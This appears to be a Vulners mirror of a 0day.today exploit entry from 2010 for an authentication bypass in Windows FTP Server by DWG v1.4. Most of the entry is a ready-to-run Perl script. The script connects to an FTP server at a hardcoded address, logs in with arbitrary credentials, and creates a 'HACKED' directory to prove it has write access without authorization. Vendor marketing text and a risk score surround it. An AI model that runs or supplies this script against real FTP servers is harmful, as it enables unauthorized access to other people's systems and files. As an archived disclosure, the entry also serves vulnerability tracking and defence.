Lucene search
K

WINDOWS FTP SERVER by DWG (Auth Bypass)

🗓️ 09 Apr 2010 00:00:00Reported by chap0Type 
zdt
 zdt
🔗 0day.today👁 53 Views

Windows FTP Server Auth Bypass vulnerabilit

Code
=======================================
WINDOWS FTP SERVER by DWG (Auth Bypass)
=======================================

# Exploit Title: WINDOWS FTP SERVER by DWG (Auth Bypass)
# Date: April 09, 2010
# Software Link: [http://www.windowsftpserver.com/free_download.html]
# Version: v 1.4
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
# Site: [www.setfreesecurity.com]
#
# Windows FTP Server by DWG Software is vulnerable to
# authentication-bypass that will allow attackers to
# connect with any username and password.
# This give attackers full access to the Top Level
# directory of the ftp server.
#
# Greetz and many thanks to all Exploit-DBers and GOD gets the Glory
#
#
#!/usr/bin/perl
 
use IO::Socket;
 
$luser = "evil";
$pass = "hacker";
 
$mysock = IO::Socket::INET->new(PeerAddr =>'192.168.2.6', PeerPort => '21', Proto => 'tcp');
 
print "Connecting with a bad credentials. . .\n";
sleep(1);
 
print $mysock "USER $luser\r\n";
print $mysock "PASS $pass\r\n";
 
print "Making HACKED folder . . .\n";
sleep(2);
 
print $mysock "MKD HACKED\r\n";
 
print "DONE . . .\n";
sleep(1);



#  0day.today [2018-02-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Apr 2010 00:00Current
7.1High risk
Vulners AI Score7.1
53